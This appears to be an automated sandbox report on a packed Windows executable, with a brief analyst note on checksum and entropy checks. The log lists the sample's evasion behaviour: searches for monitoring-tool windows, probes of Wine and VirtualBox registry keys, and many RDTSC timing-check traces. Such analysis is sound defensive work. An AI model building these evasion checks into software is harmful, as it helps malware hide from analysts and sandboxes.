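To reproduce the checksum line on the real sample, read the file, locate e_lfanew at offset 0x3C, and call verify_checksum(data, e_lfanew + 88); the stored value should come back as 0x1cbb36. Entropy is best measured per section on the raw bytes, since averaging over the whole file dilutes the packed region with headers and imports.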

Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Regmonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: Filemonclass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC84F second address: 5DC863 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F66E8C719DCh 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 5DC863 second address: 5DC867 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7578F6 second address: 7578FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7578FB second address: 757911 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F66E8838CF0h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757911 second address: 757920 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F66E8C719D6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75702E second address: 757038 instructions: 0x00000000 rdtsc 0x00000002 je 00007F66E8838CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757171 second address: 757184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push ebx 0x0000000a push esi 0x0000000b pop esi 0x0000000c jnp 00007F66E8C719D6h 0x00000012 pop ebx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757184 second address: 75718A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 75718A second address: 757190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757190 second address: 7571E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF6h 0x00000007 jmp 00007F66E8838CF4h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push edx 0x0000000f jnp 00007F66E8838CE6h 0x00000015 pop edx 0x00000016 pop edx 0x00000017 pop eax 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c jmp 00007F66E8838CF9h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7571E5 second address: 7571EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7571EB second address: 757207 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E8838CECh 0x00000008 pushad 0x00000009 popad 0x0000000a jc 00007F66E8838CE6h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 push esi 0x00000014 pop esi 0x00000015 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 757207 second address: 75720B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759864 second address: 7598A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 mov dword ptr [esp], eax 0x0000000b mov ecx, 633D60DBh 0x00000010 push 00000000h 0x00000012 sub esi, 150B3910h 0x00000018 call 00007F66E8838CE9h 0x0000001d push esi 0x0000001e push edx 0x0000001f jmp 00007F66E8838CF1h 0x00000024 pop edx 0x00000025 pop esi 0x00000026 push eax 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a js 00007F66E8838CE6h 0x00000030 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759952 second address: 75996B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c pop eax 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759A04 second address: 759A0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759A0A second address: 759A67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 jmp 00007F66E8C719DAh 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push ebx 0x00000010 call 00007F66E8C719D8h 0x00000015 pop ebx 0x00000016 mov dword ptr [esp+04h], ebx 0x0000001a add dword ptr [esp+04h], 00000018h 0x00000022 inc ebx 0x00000023 push ebx 0x00000024 ret 0x00000025 pop ebx 0x00000026 ret 0x00000027 mov ecx, eax 0x00000029 push 00000000h 0x0000002b xor esi, 223642BAh 0x00000031 call 00007F66E8C719D9h 0x00000036 push edi 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007F66E8C719E5h 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759BED second address: 759C00 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CEFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 759C00 second address: 759C06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 76BBCE second address: 76BBD8 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F66E8838CECh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 77ADA4 second address: 77ADA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 73E732 second address: 73E74C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jp 00007F66E8838CE6h 0x0000000a popad 0x0000000b pushad 0x0000000c jmp 00007F66E8838CECh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 778DB8 second address: 778DC2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 778EFE second address: 778F03 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779055 second address: 779059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779059 second address: 779074 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push edi 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779074 second address: 77907A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7791D2 second address: 7791DD instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jns 00007F66E8838CE6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7791DD second address: 7791FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F66E8C719E8h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779725 second address: 779731 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779731 second address: 779740 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b push edi 0x0000000c pop edi 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 779740 second address: 779744 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7799D4 second address: 7799D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7799D8 second address: 7799E2 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F66E8838CE6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7799E2 second address: 7799EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7799EB second address: 7799F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: 7799F0 second address: 7799FC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 jp 00007F66E8C719D6h 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 779D0B second address: 779D0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAD9 second address: 76FADF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FADF second address: 76FAE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAE9 second address: 76FAEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAEF second address: 76FAF4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FAF4 second address: 76FB1E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E8C719E1h 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f je 00007F66E8C719F6h 0x00000015 pushad 0x00000016 jg 00007F66E8C719D6h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 76FB1E second address: 76FB28 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A74D second address: 77A788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F66E8C719E1h 0x00000009 jmp 00007F66E8C719E5h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007F66E8C719DCh 0x00000018 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A788 second address: 77A7B7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF9h 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push ebx 0x0000000f jns 00007F66E8838CE6h 0x00000015 pop ebx 0x00000016 push edi 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A7B7 second address: 77A7BC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A7BC second address: 77A7D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F66E8838CEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A7D0 second address: 77A7D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A927 second address: 77A931 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A931 second address: 77A94C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E7h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77A94C second address: 77A95A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jc 00007F66E8838CECh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77D702 second address: 77D707 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77CDF9 second address: 77CE15 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 js 00007F66E8838CE6h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66E8838CEDh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDC7 second address: 77DDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 77DDCB second address: 77DDD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78180D second address: 781832 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DEh 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b jmp 00007F66E8C719E1h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78438A second address: 78438E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78496C second address: 784973 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 784AFA second address: 784B0A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 push ebx 0x00000008 jl 00007F66E8838CECh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7489B6 second address: 7489C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7489C1 second address: 7489C5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7898D8 second address: 789934 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 js 00007F66E8C719D6h 0x00000009 push eax 0x0000000a pop eax 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f jmp 00007F66E8C719E5h 0x00000014 mov eax, dword ptr [esp+04h] 0x00000018 jmp 00007F66E8C719E8h 0x0000001d mov eax, dword ptr [eax] 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F66E8C719E8h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789934 second address: 78998B instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F66E8838CFFh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp+04h], eax 0x0000000e jno 00007F66E8838CFDh 0x00000014 pop eax 0x00000015 mov di, bx 0x00000018 call 00007F66E8838CE9h 0x0000001d push eax 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 popad 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78998B second address: 789991 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 789991 second address: 7899C8 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E8838CF9h 0x00000008 jmp 00007F66E8838CF3h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 ja 00007F66E8838CF0h 0x00000016 jmp 00007F66E8838CEAh 0x0000001b mov eax, dword ptr [esp+04h] 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7899C8 second address: 7899CC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A0D8 second address: 78A0DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A61B second address: 78A61F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A61F second address: 78A62F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d push edx 0x0000000e pop edx 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A62F second address: 78A634 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A81B second address: 78A820 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78A906 second address: 78A90C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AB5A second address: 78AB5E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AB5E second address: 78AB64 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78AB64 second address: 78AB81 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F66E8838CE8h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F66E8838CEEh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B9EC second address: 78B9F2 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78B9F2 second address: 78BA6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8838CF4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov dword ptr [ebp+12476DB4h], ecx 0x00000012 push 00000000h 0x00000014 jmp 00007F66E8838CF3h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007F66E8838CE8h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 jmp 00007F66E8838CEBh 0x0000003a push eax 0x0000003b pushad 0x0000003c pushad 0x0000003d jbe 00007F66E8838CE6h 0x00000043 js 00007F66E8838CE6h 0x00000049 popad 0x0000004a pushad 0x0000004b push eax 0x0000004c pop eax 0x0000004d push eax 0x0000004e push edx 0x0000004f rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D58F second address: 78D644 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719E8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F66E8C719E0h 0x00000011 pop esi 0x00000012 jmp 00007F66E8C719E8h 0x00000017 popad 0x00000018 nop 0x00000019 push 00000000h 0x0000001b push ebp 0x0000001c call 00007F66E8C719D8h 0x00000021 pop ebp 0x00000022 mov dword ptr [esp+04h], ebp 0x00000026 add dword ptr [esp+04h], 00000014h 0x0000002e inc ebp 0x0000002f push ebp 0x00000030 ret 0x00000031 pop ebp 0x00000032 ret 0x00000033 push 00000000h 0x00000035 mov dword ptr [ebp+122D2051h], edx 0x0000003b push 00000000h 0x0000003d push 00000000h 0x0000003f push ebx 0x00000040 call 00007F66E8C719D8h 0x00000045 pop ebx 0x00000046 mov dword ptr [esp+04h], ebx 0x0000004a add dword ptr [esp+04h], 00000019h 0x00000052 inc ebx 0x00000053 push ebx 0x00000054 ret 0x00000055 pop ebx 0x00000056 ret 0x00000057 xchg eax, ebx 0x00000058 jmp 00007F66E8C719DDh 0x0000005d push eax 0x0000005e push eax 0x0000005f push edx 0x00000060 push esi 0x00000061 jmp 00007F66E8C719E1h 0x00000066 pop esi 0x00000067 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78D644 second address: 78D64A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EC2D second address: 78EC33 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78EC33 second address: 78EC3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78F632 second address: 78F67E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 mov dword ptr [esp], eax 0x00000009 and di, 65D3h 0x0000000e push 00000000h 0x00000010 add dword ptr [ebp+122D33ACh], edi 0x00000016 push 00000000h 0x00000018 push 00000000h 0x0000001a push esi 0x0000001b call 00007F66E8C719D8h 0x00000020 pop esi 0x00000021 mov dword ptr [esp+04h], esi 0x00000025 add dword ptr [esp+04h], 00000014h 0x0000002d inc esi 0x0000002e push esi 0x0000002f ret 0x00000030 pop esi 0x00000031 ret 0x00000032 adc di, 7FD2h 0x00000037 xchg eax, ebx 0x00000038 push ebx 0x00000039 push eax 0x0000003a push edx 0x0000003b jmp 00007F66E8C719DFh 0x00000040 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78E9B8 second address: 78E9C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F66E8838CE6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FF3D second address: 78FF56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F66E8C719DAh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jo 00007F66E8C719E4h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 78FF56 second address: 78FF5A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
